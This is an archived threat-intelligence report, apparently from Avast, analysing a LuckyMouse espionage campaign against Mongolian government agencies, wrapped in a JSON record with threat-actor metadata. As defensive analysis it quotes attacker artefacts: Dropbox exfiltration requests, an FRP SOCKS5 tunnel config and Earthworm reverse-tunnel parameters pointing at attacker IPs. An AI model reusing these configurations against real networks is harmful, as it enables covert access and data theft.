{ "id": "67590e56-9c0b-445f-b916-47fd3fff1ec7", "created_at": "2026-04-06T00:16:11.797598Z", "updated_at": "2026-04-10T03:36:06.524867Z", "deleted_at": null, "sha1_hash": "f369af064150cf306bb848bf041777e46e140849", "title": "APT group targeting governmental agencies in East Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3181517, "plain_text": "APT group targeting governmental agencies in East Asia\r\nBy Threat Research TeamThreat Research Team\r\nArchived: 2026-04-05 12:53:12 UTC\r\nIntroduction \r\nThis summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center\r\nof Mongolia. We consider with moderate confidence based on our research that the chinese-speaking APT group\r\nLuckyMouse is behind the attack. \r\nThe APT group planted backdoors and keyloggers to gain long-term access to government networks and then\r\nuploaded a variety of tools that they used to perform additional activities on the compromised network such as\r\nscanning of the local network and dumping credentials. We presume that the main aim of cyber-espionage was the\r\nexfiltration of sensitive data from potentially interesting government agencies.\r\nAccording to our local telemetries, we consider that the government institutions were attacked in two ways. One\r\nwas through a vulnerable company who is providing services for these agencies, and the other was through an\r\nemail spear-phishing with a malicious attachment – a weaponized document using CVE-2017-11882. \r\nThere are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing\r\nsome previously undocumented tactics indicating that the actors have updated their toolset with Polpo and\r\nLuckyBack backdoors. Our analysis below will highlight those new tactics. \r\nAttribution \u0026 Clusterization\r\nWe base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found\r\nduring the investigation of this campaign, most of them having previously been attributed to LuckyMouse by\r\nother researchers[1][2][3].\r\nIn 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing\r\nAsian government resources. Their blog posts described several tool sets such as network filtering driver\r\nNDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by\r\nChinese-speaking actors), and Earthworm tunneler. They also described a DLL sideloading technique abusing\r\nlegitimate applications from Symantec (IntgStat.exe). This is a legitimate application that loads a DLL\r\npcalocalresloader.dll. By sideloading their own version pcalocalresloader.dll, they load HyperBro RAT from a\r\ncompressed and encrypted file thumbs.db. While some of the tools that were used were publicly known tools that\r\nare available on the internet, the group also developed their own tools, including a rootkit[1][2].\r\nIn April 2019, PaloAlto Networks released a blogpost about LuckyMouse. According to the post, the group\r\ninstalled webshells on a SharePoint server to compromise Government Organizations in the Middle East.\r\nSimilarly, the group used several publicly known and available tools (such as mimikatz, curl, ntbscan). But what\r\ngot our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 1 of 15\n\nattack we analyzed also used a DLL sideloading technique, although with different executables. The executable\r\nused was a Symantec application thinprobe.exe that loads thinhostprobedll.dll. This DLL was then used to\r\nsideload thumb.db that contained encrypted and compressed HyperBro[3].\r\nWe’ve also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This\r\nbackdoor was accompanied by samples that are known to be used by the LuckyMouse group which lead us to the\r\nconclusion that this backdoor is a new addition into LuckyMouse’s toolkit. We also observed more common tools,\r\ne.g. VMProtect-obfuscated Earthworm tunneler, a custom installer dropping NDISProxy network filtering driver,\r\nand various network scanners.\r\nInfection Chain\r\nWe observed that this APT group was also targeting an unknown company that was providing services to\r\ngovernment institutions in East Asia. The group infiltrated the company’s computers and managed to harvest\r\ncredentials belonging to the company’s email accounts. Unfortunately, we haven’t been able to identify which\r\nattack vector was used in this infiltration. These credentials were then used to send emails from the hacked\r\ncompany’s email accounts to the government officials. While we were unable to recover the whole email, we’ve\r\nmanaged to recover the email’s header. The header indicates that these emails were asking the recipient to update\r\na firmware, i.e. launch a self-extracting 7-zip archive attached to this email.\r\nDate: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT) \r\nSubject: Re: Perform a firmware update on the server\r\nXXXXXX_update.exe \r\n(sha256:2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D)\r\nThis archive drops three already familiar files – Symantec’s thinprobe.exe, malicious thinhostprobedll.dll, and\r\nthumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally\r\nloading its processed content – a HyperBro RAT . This backdoor has also been reported on by Kaspersky[1] and\r\nPaloAlto Networks[3], the latter providing an extensive description of the HyperBro RAT.\r\nFigure 1: Overview of infection vector\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 2 of 15\n\nToolset\r\nIn this following section we describe a tool set we found on the victim’s PC, used by the APT group for cyber-espionage and lateral movement through the network. We could divide these tools into three categories:\r\nHelpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector\r\nRemote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo\r\nPublicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler\r\nIn detail, we found the following tools:\r\nThis tool installs wcm.dll into %WINDIR%\\system32, a registry record\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WindowsConnections Manager\r\nis created with the following values:\r\nDescription: Makes automatic connect/disconnect decisions based on the network connectivity options currently\r\navailable to the PC and enables management of network connectivity based on Group Policy settings.\r\nDisplayName: Windows Connections Manager\r\nServiceDll: C:\\Windows\\system32\\wcm.dll.\r\nThis effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts – embedded\r\nDLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the windows loader.\r\nThe final payload DLL is written in GO and contains a single export named “Interface“. This function expects 4\r\narguments consisting of two strings and their corresponding lengths. The string values specify the victim ID and\r\nthe Dropbox API key to use. The API key is passed in as an RC4 encrypted + base64 encoded value.\r\nThe hardcoded decryption key is “0000111122223333“. The DLL additionally contains a default API key which\r\nappears to be for the authors test account.\r\nInitially, it tries do download a file from Dropbox via the HTTP API:\r\nPOST /2/files/download HTTP/1.1\r\nHost: content.dropboxapi.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 0\r\nAuthorization: Bearer [snipped]\r\nDropbox-Api-Arg: {“path”: “/infos/000000.txt”}\r\nAccept-Encoding: gzip\r\nIf the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox:\r\nPOST /2/files/upload HTTP/1.1\r\nHost: content.dropboxapi.com\r\nUser-Agent: Go-http-client/1.1\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 3 of 15\n\nContent-Length: 36\r\nAuthorization: Bearer [snipped]\r\nContent-Type: application/octet-stream\r\nDropbox-Api-Arg: {“path”: “/infos/116a0d.txt”,”mode”: “overwrite”,”autorename”: true,”mute”:\r\nfalse,”strict_conflict”: false}\r\nAccept-Encoding: gzip\r\n%currentDate% %currentTime%##%hostname%\r\nAfterwards, a C\u0026C request-response loop is started. Based on the response from the C\u0026C server, one of the\r\nfollowing commands is executed: download files, upload files, sleep, quit, or execute commands on a command\r\nline. See the following diagram for a detailed flow, keep in mind that all download/upload are using the\r\naforementioned Dropbox API:\r\nFigure 2: Overview of detailed execution flow\r\nServiceInstaller\r\nWe assume that this installer is intended to be executed by one of the aforementioned backdoors as it requires\r\ncommand-line parameters for its successful execution:\r\nAt first, security descriptors of both %windir%\\system32\\ and %windir%\\system32\\drivers\\ changes to allow the\r\ncurrent user to copy files to these locations. Then the installer copies a service executable to %windir%\\system32\\\r\nunder a randomly generated name (4 alphanumeric characters).\r\nDepending on whether a service named DFS Replication already exists in \r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost netsvcs,\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 4 of 15\n\na new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is\r\ncreated. More specifically, its parameters are:\r\nDescription: “Configures Internet Authentication Service (IAS). If this service is stopped, the remote network\r\naccess that requires user authentication will be unavailable. If this service is disabled, any services that explicitly\r\ndepend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is\r\nused to roam folders between PCs; on the server, it is used to provide high availability and local access across a\r\nwide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server\r\nbecome out-of-date. If the service is disabled, any services that explicitly depend on it will not start.”\r\nDisplayName: DFS Replication/IAS Jet Database Access Service %number%\r\nServiceDll: C:\\Windows\\system32\\\u003c4 random alphanumeric characters\u003e.dll.\r\nTag: 0\r\nSecurity: 0\r\nShellCodeExecutor\r\nThis utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for\r\ndecoding and unpacking can be seen below:\r\nFigure 3: Decoding algorithm and executing decoded payload in allocated memory\r\nWhile we weren’t able to reconstruct which stage this executor was used, we were able to recover its parameter\r\nthat corresponds to a hex-encoded metasploit-generated shellcode (reverse HTTP proxy – Github configured to\r\nconnect to URL oss.chrome-upgrade[.]com (202.59.9[.]58). We suspect that the threat actors used the shellcode\r\njust to retrieve and execute a further stage from the C\u0026C server.\r\nThis tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions. It\r\nrecursively scans all connected drives for such documents that were modified in 2020 and later. Gathered\r\ndocuments are packed using Winrar and the archive is protected with a password “zaq1xsw@cde3”. This archive\r\nwill be then saved to C:\\MSBuild\\NVIDIA\\ under a filename CRYPTO-%computerName%-%number_value%.SYS.\r\nThis scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after reboot), only documents\r\nthat were modified in the last 24 hours are gathered.\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 5 of 15\n\nAfter each run, a file %windir%\\system32\\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C\u0026C.\r\nUnfortunately, we were not able to recover this script.\r\nThis binary is a simple filescanner that is provided with a list of file extensions, a list of directories, and date\r\nboundaries as parameters. Every directory from the list is searched for files with a given file extension. If such\r\nfiles are found and their modification date is within the provided date boundaries (in UTC), their full paths are\r\nwritten down into the output file. These paths are delimited by Windows line delimiters and they are encoded in\r\n16-bit Unicode.\r\nBelow you will see a part of an error message, providing us the information about how this utility is used:\r\nT040ClientLite.exe suffix .txt,.xls scanDirs E:\\\\test,E:\\\\test1 output E:\\\\test\\\\output.txt startEditDate 2020/04/26\r\nendEditDate 2020/04/27\r\nMore generally, the command’s format is:\r\nT040ClientLite.exe suffix \u003cfile extensions\u003e scanDirs \u003cdirectories\u003e output \u003coutput file\u003e startEditDate \u003cdate\u003e\r\nendEditDate \u003cdate\u003e\r\nInformation Collector\r\nThe Information Collector focuses on removable drives. If no such drives are connected, its execution is\r\nterminated. The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with\r\na 64 byte XOR key, and stores it onto the system drive as hidden files. More specifically, it uses the following\r\ndirectories:\r\nC:\\MSBuild\\Resources\\Format\\S-1-1 (encrypted files)\r\nC:\\MSBuild\\Resources\\Format\\S-1-0\\S-1-0-0 (unencrypted temporary files, deleted after encryption)\r\nFigure 4: Sample enumerate drives, checking their type with GetDriveTypeA\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 6 of 15\n\nIt ensures its persistence by adding itself into Run (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) registry\r\nkey under AvpSecurity.\r\nInterestingly, it contains many unused functions using command-line tools such as: systeminfo, arp, ipconfig,\r\nnetstat, and tasklist. It also supports archiving the collected information using WinRAR with a hard-coded\r\npassword “1qaz@WSX”. The sample has no networking capabilities. It primarily serves for collecting the\r\ninformation and transferring the gathered information using removable drives between the machines in the\r\nnetwork.\r\nMoreover, the particular sample we analyzed contained a bug in the drives’ enumeration routine that made it\r\nvirtually useless as it hampered all the sample’s functionality.\r\nRAT\r\nKorplug (PlugX)\r\nKorplug (PlugX) is a well-known Remote Access Trojan associated with Chinese speaking attackers and it has\r\nbeen used in a large number of targeted attacks since 2012[4]. It uses DLL side-loading to load itself into the\r\nmemory through legitimate applications. It helps it stay unnoticed by any security product. Korplug is a fully\r\nfeatured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to\r\na remote cmd.exe shell. \r\nIn our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was\r\nsigned with a valid, but expired certification. After executing unsecapp.exe, it loads a malicious DLL http_dll.dll.\r\nThis DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug which is then loaded into the\r\nmemory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped\r\nand executed these files.\r\nAddress of C\u0026C servers: \r\nweb[.]microlynconline[.]com:80\r\nhome[.]microlynconline[.]com:8000\r\nhelp[.]microlynconline[.]com:443\r\nhost[.]microlynconline[.]com:53\r\nBackdoors\r\nWe found three different backdoors in the government office network, two of which, PolPo and LuckyBack, were\r\nnever seen in any previous campaign. Polpo also hits the National Data Center, and the two others, BlueTraveller\r\nand LuckyBack, only hit the government office network.\r\nLuckyBack\r\nLuckyBack collects the computer’s fingerprint, at first, and then tries to establish a communication with the C\u0026C\r\nserver (45.77.55[.]145). Once the communication is established, the backdoor starts listening for commands. It is\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 7 of 15\n\ncapable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and\r\nscreen capturing.\r\nTechnical:\r\nAt first, the used code page is retrieved by calling chcp, a command providing the keyboard and character set\r\ninformation, on the system drive.\r\nThe first request on the C\u0026C server “registers” the device by providing its fingerprint. Namely, the fingerprint is\r\nconstructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP\r\naddress, code page, and RDP session ID.\r\nIf the server accepts the registration, it responds with the PID and a simple string “OK”. Afterwards, a simple\r\nrequest-response C\u0026C loop is started, and commands and their corresponding numbers are displayed in the table\r\nbelow:\r\nBlueTraveller\r\nThis backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload,\r\ndownload, and execute on the command line. Nevertheless, it uses two layers of C\u0026C servers, meaning that the\r\nfirst request is on the first layer, and it yields an IP address of a C\u0026C server from the second layer. Afterwards, the\r\nrequest-response C\u0026C loop uses the second layer. If the backdoor receives a command for the command line, the\r\noutput from the console is encrypted with AES-256 and sent back to the second-layer C\u0026C server.\r\nThe binary itself has its strings encrypted with RC4, using a hardcoded key “L!Q@W#E$R%T^Y\u0026U*A|}t~k”.\r\nAmong these strings, we may find the address of the first-layer C\u0026C server and the user agent that should be used\r\nfor these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. The response seems to be\r\npretty inconspicuous at first glance. But once we have a look more closely, we see that many lines are followed by\r\na mixture of tabs and spaces,which is rather fishy indeed. And surprisingly this is where the IP address of the\r\nsecond C\u0026C layer hides!\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 8 of 15\n\nFigure 5: Response from first layer of C\u0026C server\r\nFigure 6: Script which decrypts the white spaces from the html response\r\nThe BlueTraveller uses the same scheme for encryption – AES-256 with a key derived from a string that is hashed\r\nwith SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C\u0026C. For this first request, the key is derived from a string “0304276cf4f31345“. The key is then used to\r\nencrypt the generated GUID and the computer’s hostname which are then Base64-encoded and used to generate\r\nthe request URL:  \r\nhttp://\u003csecond_layer_C\u0026C\u003e/home/\u003crand number\u003e/\u003cenc_length\u003e/\u003cBase64 data\u003e.\r\nAfter this request is executed, commands are retrieved from:\r\nhttp://\u003csecond_layer_C\u0026C\u003e/index.htm.\r\nThe obtained data is encrypted with AES-256, using the aforementioned approach with GUID as a base-string for\r\nthe key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch,\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 9 of 15\n\nthe command is discarded. If a command for the command line is received, the output of the executed command\r\n(AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to\r\nhttp://\u003csecond_layer_C\u0026C\u003e/help/\u003crand number\u003e/\u003cenc_length\u003e/\u003cBase64 data\u003e.\r\nPolpo\r\nPolpo is a backdoor that we’ve been seeing in the wild since 2018. It supports around 15 different commands\r\nincluding information collection and exfiltration, file transfer, and proxy connections.\r\nBase64-encoded addresses of C\u0026C servers are hard-coded in the binary\r\nPolpo – Communication\r\nThe backdoor mimics the HTTP protocol to blend with the normal traffic. The transferred data is encrypted with\r\nAES and encoded into Base64 then sent as a part of fake HTML content. \r\nFigure 7: Command data parsing\r\nThe AES encryption key is derived from the first packet of each new command received from the C\u0026C server,\r\nusing the algorithm below:\r\nFigure 8: Encryption key computation\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 10 of 15\n\nThe sample checks for a proxy configured on the system found in the Registry Key\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable. If a proxy is configured it uses the\r\nserver specified in Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer for all the\r\nconnections. \r\nPolpo – Functionality\r\nThere are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the\r\ncommands are executed in separate threads. Errors and inter-thread communication are handled using Events.\r\nFigure 9: Command dispatcher\r\nThese commands are supported by the version of Polpo we’ve analyzed:\r\nAn open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage) was detected on several compromised\r\ndevices. It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to\r\nexecute tasks and programs under administrator-level permissions. \r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 11 of 15\n\nPort-scanners\r\nSeveral different port scanners were seen on compromised devices under various filenames. One of the used port\r\nscanners was open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the\r\nports of the server to find out which services were running.\r\nNbtscan\r\nNbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the\r\nnetwork.\r\nPasswords dumpers\r\nMimikatz and Lazagne were seen on the infected computers. We presume that they were used to retrieve\r\ncredentials from the compromised computers. We’ve also spotted a wrapped Mimikatz version, download from\r\nhttps://github.com/jas502n/mimikat_ssp, on several compromised devices.\r\nFRP\r\nFast Reverse Proxy (FRP) is a tool that allows you to expose local services that are hidden behind the NAT or a\r\nfirewall to the internet. Both the raw TCP and UDP are supported as well as several other protocols whose\r\nrequests can be forwarded to the internal services via this proxy. We’ve recovered a configuration file 3bef4cd.tmp\r\nfor this proxy. The content of this proxy is the following:\r\n[common]\r\nserver_addr = 202.59.9[.]58\r\nserver_port = 8443\r\nprivilege_token = %token%\r\n[SDJY_proxy]\r\ntype = tcp\r\nremote_port = 6001\r\nplugin = socks5\r\nIt is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network\r\nvia 202.59.9[.]58:8443.\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 12 of 15\n\nFigure 10: Diagram of FRP tool usage\r\nEarthworm tunneler\r\nThe Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky[1]. We’ve\r\nseen this tool on all compromised systems of national data center. On one of these devices, we’ve managed to\r\nrecover command-line parameters that were used:  -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a\r\nSOCKS tunnel to the provided server. It is publically available at http://rootkiter.com/EarthWorm/.\r\nConclusions\r\nAs this blogpost demonstrates, LuckyMouse has used new methods to infiltrate the government institution through\r\na third party’s system which they attacked. \r\nAvast has recently protected users in the government institution and national data center from further attacks using\r\nthe samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in\r\nthe whitespace of the C\u0026C response. We presume that the attackers updated their attacking toolset in this\r\ncampaign after it was discovered by Avast.\r\nI would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research.\r\nIndicators of Compromise (IoC)\r\n Repository: https://github.com/avast/ioc/tree/master/\r\nList of SHA-256: https://github.com/avast/ioc/blob/master/\r\nMITRE ATT\u0026CK techniques\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 13 of 15\n\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 14 of 15\n\nA group of elite researchers who like to stay under the radar.\r\nSources\r\nSource: https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" ], "report_names": [ "apt-group-targeting-governmental-agencies-in-east-asia" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "4ae78ca3-8bc8-4d67-9df1-a85df250a8a0", "created_at": "2024-10-08T02:00:04.469211Z", "updated_at": "2026-04-10T02:00:03.726781Z", "deleted_at": null, "main_name": "TaskMasters", "aliases": [ "BlueTraveller" ], "source_name": "MISPGALAXY:TaskMasters", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434571, "ts_updated_at": 1775792166, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.pdf", "text": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.txt", "img": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.jpg" } }